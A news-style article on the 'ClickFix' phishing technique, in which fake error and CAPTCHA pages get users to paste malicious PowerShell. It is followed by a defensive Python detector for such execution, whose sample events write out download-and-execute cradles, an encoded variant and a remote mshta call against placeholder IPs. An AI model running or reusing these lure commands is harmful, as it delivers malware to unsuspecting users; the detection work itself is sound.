ClickFix: The Next Evolution in Stealthy Phishing Attacks

205/68 Monday, June 9, 2025

Cybersecurity researchers are warning of a new and increasingly sophisticated phishing technique known as “ClickFix,” which is rapidly gaining traction and targeting businesses worldwide. The technique represents a significant evolution in social engineering attacks, as it lures victims into performing seemingly routine or benign tasks that ultimately lead to malware installation. According to reports from security firms such as Darktrace and SlashNext, ClickFix campaigns have been observed across multiple regions, highlighting its growing adoption among cybercriminals.

ClickFix first gained attention in 2023 when researchers at Proofpoint identified compromised websites displaying overlay error messages that claimed the user’s browser needed an update. Victims were tricked into opening Windows PowerShell (Admin) and running a script that appeared to be a fix, but actually delivered malware like Vidar stealer. Since April 2024, ClickFix techniques have evolved to include delivery of various malware types including Remote Access Trojans (RATs), backdoors, cryptominers, and even ransomware. The phishing lures also vary—from fake browser plugin updates to fraudulent job interview sites designed to trick victims into installing password stealers or backdoors.

Experts emphasize that ClickFix's success lies in its deceptive simplicity: instead of exploiting a software flaw, it convinces the user to perform an action that looks routine (copying a command and pasting it into a PowerShell window) and thereby run the attacker's code under the user's own account. Attackers have mimicked trusted interfaces such as Cloudflare Turnstile CAPTCHAs or even Booking.com error pages to get users to copy and paste malicious scripts. Alarming trends also show that ClickFix is now being sold as a plug-and-play module on underground forums, lowering the technical barrier for would-be attackers and signaling a shift toward modular, customizable phishing kits.

Cybersecurity professionals advise organizations to rethink phishing defense beyond basic email filtering and awareness training. Defense strategies should include monitoring post-click browser and endpoint activity, detecting suspicious redirect behavior, and preparing incident response plans to mitigate damage when attacks succeed. Because the final step is executed by the user rather than by an exploit, the most reliable signal is endpoint telemetry: a script host (PowerShell, mshta, cmd) launched from an interactive parent with a command line that downloads and executes remote content is suspicious regardless of which lure preceded it. Multi-factor authentication is still worth deploying, but its value here is in limiting what an attacker can do with credentials a stealer exfiltrates; it does nothing to stop the pasted script from running.
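The post-click monitoring recommended above can be made concrete as a triage rule over process-creation telemetry. The following is an added example, not code from the article or from any vendor it cites: it scores constructed process-creation events (a loose approximation of Sysmon Event ID 1 fields, not any real schema) for the ClickFix execution pattern the article describes, a script host started from an interactive parent with a download-and-execute command line, and it decodes `-EncodedCommand` payloads so base64 cannot hide the cradle. The sample events, IP addresses and the "decoy comment" indicator are assumptions for illustration; the decoy-comment heuristic reflects public reporting on pasted ClickFix commands rather than anything stated on this page.

```python
"""Heuristic triage of process-creation events for ClickFix-style execution.

Added example (not from the article). The tell-tale of a successful ClickFix
lure is a human pasting a command into a PowerShell window or the Run box, so
the child script host is launched under an interactive parent (explorer.exe)
and its command line fetches and runs remote content.
"""
import base64
import re

# Script hosts and LOLBins that ClickFix lures have been reported to invoke.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
                "bitsadmin.exe"}

# Parents that mean "a person typed or pasted this": the Run dialog and the
# Start menu both launch their children under explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}

# (name, regex) pairs; each match adds one point and its name to the verdict.
INDICATORS = [
    ("download_cradle", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|start-bitstransfer|curl|certutil)\b", re.I)),
    ("inline_eval", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("remote_url", re.compile(r"https?://\S+", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-e(xecution)?p(olicy)?\s+bypass", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I)),
    # Assumption from public reporting, not from this page: pasted commands
    # often end in a reassuring comment so the Run box shows benign-looking text.
    ("decoy_comment", re.compile(r"#\s*.*\b(robot|captcha|verif)", re.I)),
]

# PowerShell accepts any unique prefix of -EncodedCommand; cover the common ones.
ENCODED_CMD = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand payload, or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Score one event; returns {"score", "reasons", "decoded"}."""
    image, parent = basename(event["image"]), basename(event["parent"])
    cmdline, reasons = event["cmdline"], []
    if image not in SCRIPT_HOSTS:
        return {"score": 0, "reasons": reasons, "decoded": None}
    if parent in INTERACTIVE_PARENTS:
        reasons.append("interactive_parent:" + parent)
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded_command")
    # Search the raw and the decoded command line so base64 cannot hide a cradle.
    haystack = cmdline + ("\n" + decoded if decoded else "")
    for name, rx in INDICATORS:
        if rx.search(haystack):
            reasons.append(name)
    return {"score": len(reasons), "reasons": reasons, "decoded": decoded}


def triage_all(events, threshold=3):
    """(event, verdict) pairs at or above threshold, highest score first."""
    hits = [(e, triage(e)) for e in events]
    hits = [(e, v) for e, v in hits if v["score"] >= threshold]
    return sorted(hits, key=lambda ev: ev[1]["score"], reverse=True)


# Constructed sample telemetry (not real events); 203.0.113.0/24 is TEST-NET-3.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_PLAINTEXT = "iex (irm https://203.0.113.9/a)"
ENCODED_BLOB = base64.b64encode(ENCODED_PLAINTEXT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,  # classic pasted lure
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://203.0.113.7/fix.ps1 | iex" '
                '# "I am not a robot - reCAPTCHA Verification ID: 7391"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,  # same cradle, base64-wrapped
     "cmdline": "powershell -nop -w hidden -enc " + ENCODED_BLOB},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,  # user just opened a shell
     "cmdline": "powershell.exe"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": PS,  # scheduled admin script
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",  # not a script host at all
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://203.0.113.11/verify.hta"},  # HTA variant
]

if __name__ == "__main__":
    for event, verdict in triage_all(SAMPLE_EVENTS):
        print(verdict["score"], basename(event["image"]), verdict["reasons"])
        if verdict["decoded"]:
            print("   decoded:", verdict["decoded"])
```

The scoring is deliberately additive rather than a single signature: a user opening a terminal, or a scheduled task running with `-ExecutionPolicy Bypass`, each earns one point and stays below the threshold, while the pasted lure trips several indicators at once even when it is base64-encoded. In production the same logic belongs in the EDR or SIEM rule language, with the interactive-parent set widened to whatever launches the Run box and terminals in the environment.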

Source https://www.darkreading.com/remote-workforce/cutting-edge-clickfix-snowball-phishing